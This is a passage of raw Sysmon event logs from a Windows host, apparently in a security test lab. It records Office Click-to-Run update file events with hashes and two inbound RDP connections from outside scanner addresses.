Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LASER.WAVMD5=E94C385C27C3096E92DE1B39D6AFAD65,SHA256=2ACFAB9A56E4F8516190EBF13A7B93C845E52F5824D0196F2E285502E621920C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\HAMMER.WAVMD5=0D9913113500D917CB6FA3DF3587A05A,SHA256=CA7FD70C38A63AFCDC3EADBDD3694DD87A47FD3891B346B6A58EEF1764D3285B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\EXPLODE.WAVMD5=49B9DA9918858F2F28B32EE845FA4C4C,SHA256=4ECBD8D4BCD73D49E5A7D68F3E0074F4F9A8518FAE8B235AA96BF910C219A60F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\DRUMROLL.WAVMD5=340E970EA7C72E79594DD0C3596513F9,SHA256=75B15AB863A8AA6F20DB28C3400A85F8FF384675DCCDED1507486C961D893637,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\DefaultHold.wmaMD5=290E1C0972E5E4994ED5A953A87006AB,SHA256=C519287D487D51F1E03B18CBE83C8EDB23A6846C113CD1400BACEF0439A6CBEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\COIN.WAVMD5=238C601CF9D60A50432B497CA5F825E3,SHA256=3BBDEF4E7D3398C3617F8269642C6D1AA7B22E5332C67025239581847B41E0BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\CLICK.WAVMD5=3D628041A2CB17F222234DDF06B494F1,SHA256=A797A293428AFE1E9999A5FFCCD1AD7B9B581D427189DE02CAF66F389A70A31B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\CHIMES.WAVMD5=C2DEA2C78EB9CFDBDE343FBF9B55D380,SHA256=32242D72912A92504C344B64943DEBDE242EE77F34301E0EF220E80E3D8CFDCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\CASHREG.WAVMD5=307669F8F2529007A5E14CD4A236B07F,SHA256=B449CA058DA47C005B479CAD24EA475DFCE2F62482D862EFA5B437E630CD1A1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\CAMERA.WAVMD5=B16282C042EF5E5646B4360579F688D4,SHA256=2BABB49407FF2972EFAF8C6821B0CD950DF3FE6E5FA46A94B09984AE5ADF7DBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\BREEZE.WAVMD5=C8BB66660816C04933DE66D4B4CCE436,SHA256=479D4ECFA527AB1FF0ACD29F7BE41C1368A1BC39118752AC05DE24A8C23B6589,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\BOMB.WAVMD5=2697BDC3376ED348CF2263F24B05C28F,SHA256=A641ED5F90E4C2C4B955FA7522B8C35ECB10B93CF7F90E80BCBDC5E3F01545B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\ARROW.WAVMD5=B850034C11CEED4FD2A8F20BA3D57FFE,SHA256=D0D71D3F827F8C4CD9E4DB51A72465BE8426087E2B38467B3E639928116BD6E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\APPLAUSE.WAVMD5=FE2149CBA06CB3FE0ABDE6E26B0E31E5,SHA256=99E4B705D0C8B756C697E73426BD9BDB46B8E0EB9C1C317C77552D10E1C6BEDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.scale-80.pngMD5=F491A85840133B69142E24765D326485,SHA256=DBC099C8D83D81A8AC55FA6C0C57B1CAC8C1CAD57C6BD2DC4E6AD69C171A2BE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.scale-180.pngMD5=6C3308F9232E99D5055E3316FA9EC988,SHA256=D6C0E475039DAFBEAFD861111FD01C9D699CE6B2452F0288482A4E2805FC7AA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.scale-140.pngMD5=BA8450DDACE9085844EFB06A4420B2A6,SHA256=31FC47934E157F77A7DF1E835A6B4A3D4292F473AD4A3DEF094062B2C6BA3F34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.scale-100.pngMD5=F2C420612E81CF3505FC1EFD248AAE20,SHA256=7FBF07CCBCA152895E0748FFD19FA4441FBDEC249182A783596DC1620024EF8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-80.pngMD5=51954657FF807C61AFABAF4C9B27F8D3,SHA256=28A895FC41DA91B0D0F08A15D8BF342A6B2E9AC88923757A8A832A8E46CD5FF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-180.pngMD5=3CFA72BF9600A5C202908470690BEFBA,SHA256=55DD0AA19089368D66A58FA303429966EF83782EB0270AB672C761E1117A74D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-140.pngMD5=4247533E0C41C4828CEC5B5071D027FB,SHA256=4AE5B5C8D38D38B191BC9E36977F3F0C0C32B2E53CF6636A51088C3FEDADA07B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-100.pngMD5=0F2222A9A7DBB746AF8D640A799C8DE2,SHA256=3F8B3F4BD84F6D5B0CA06767A568212762B4CD53C608509B52BE7E6454C43A04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-80.pngMD5=EBE69259B4FB3C0E72B894FB65504B27,SHA256=DC4503074D35ED67C42111C33B6BA948E88564118CE3738205D090E9C0F3461A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-180.pngMD5=3DE38C0881D4572F7A3DDA2384F440BF,SHA256=6C0D64FF898C569D304EA67B39E5924301F5970214206B51C97EFE1C427AF15B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-140.pngMD5=367D9A646D37AF283C5363D598DB67E2,SHA256=275E0E50BB499335865E29EF5D63317E765EC331F306723BEFC09E6558F62F7E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000069143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.790{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com58893-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000069142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.619{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-22212-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000069141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-100.pngMD5=00131CEDEBFB3F6A40E6B082DADB331D,SHA256=65B2CC72EEA3646A2CFD2BE61DC4FA7E41009597C0B66594C845CEA520A1BF22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.scale-80.pngMD5=361B0A10446DE08A27FC5BA1D947C50D,SHA256=C47F68B70C4B2C7BB0014D81C31FF27D8B0CBD056468A0578A0148CB9358A5B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.scale-180.pngMD5=D1C19DD06F0DD2E43924576766F90380,SHA256=43088F7D19C7FF4D8966DDF42A8505D25B2A4BADC635AF2DB9216A9353BCBE65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.scale-140.pngMD5=F686CB1073C992D60AE9BC174F197FBB,SHA256=89AD4F61AF724989D9613002E05B4044020C50AFDA67A069DF0441606B28F2C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.scale-100.pngMD5=B34C89F1CC6F96C9BEBF66F0838F268C,SHA256=F2381ECC56884890A874F50139F6CDEE2E289D5A563B82F057F4CB299D89B2D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.pngMD5=1893C64E3D131CB390F5403E50F4F116,SHA256=4A69C8DDC64C526C211784DA04E8F5BFFE336BB958FDCE27DD06583B75CFD551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-180.pngMD5=0845166D45DEDB09BAD12297C5C1491E,SHA256=6BB302C13758D333EABD457A83253B0B684A46F31631D8EA7FC887683D017325,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-140.pngMD5=9A6A627E9852E4BB0F0024C49EFF034E,SHA256=98E9993770A6E22A18A87F1F5018B0B4EA8C374D04D5C5F4E015816C859F1519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-100.pngMD5=034F1295A29E8E082FAE093249999E0A,SHA256=E94CD64810C7799397B2FFCAEE0C73F3D4600B08DEC86167AD905EDCAEFE28B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-80.pngMD5=340478781BA7130C515E515D3729A8C4,SHA256=650F3E84C3667E5A76D963D9FBDC38548F96E0650D0EDE0FFEDE6B079A0BE28A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-180.pngMD5=0DF67C942B844D38D56631209A65F35C,SHA256=F0EBBD4AB4E0D0810009E7FEDB903AE4DFB03858F15BF742429B008F2E7229B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-140.pngMD5=E4ACBF31C7491F01C2D4A6EA62C9AD0E,SHA256=55123028CA1BCE445E1DE3EE10A2734621D198B223A37ED081D32033F2DFA18E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-100.pngMD5=C1FB7C3E9013817AC86DD6434F2C326E,SHA256=0E2CE6CF8417E97892A3449BBCC240198D72828AE210FE6F3E1A80823F3CD260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.scale-80.pngMD5=95EF44E6960DEE3C04F6752DACAA54AC,SHA256=D37CE140C81FE869C5F1B3AE49CDF30326338C00F61229FBCEF95C1D19FC2471,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.scale-180.pngMD5=55DE2CF0707592005986768A3CE93135,SHA256=3F904C853E3B386E6B33B589FCB53565C17F22127E6DD33BC3AC69DD4B88D6BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.scale-140.pngMD5=71B34E01EDB94042B75D6083D6761A03,SHA256=5EAE3CCC31EA35F9782728C725C194C42F852859AA4240EEBAD37555FD7678A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.scale-100.pngMD5=D1740185F5CAA2339709C9C2B99F31BA,SHA256=6358464522F1168D64D956E87C5D7BF9AD6B26B0585F5C11A001010E458C4F51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-80.pngMD5=7EF7709AC0D8817C3662177351A9CEAF,SHA256=7D557773DDD91B99B2F8E3B8143B5443D18DD1B84EB7F5F78FCE6075C4E5CABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 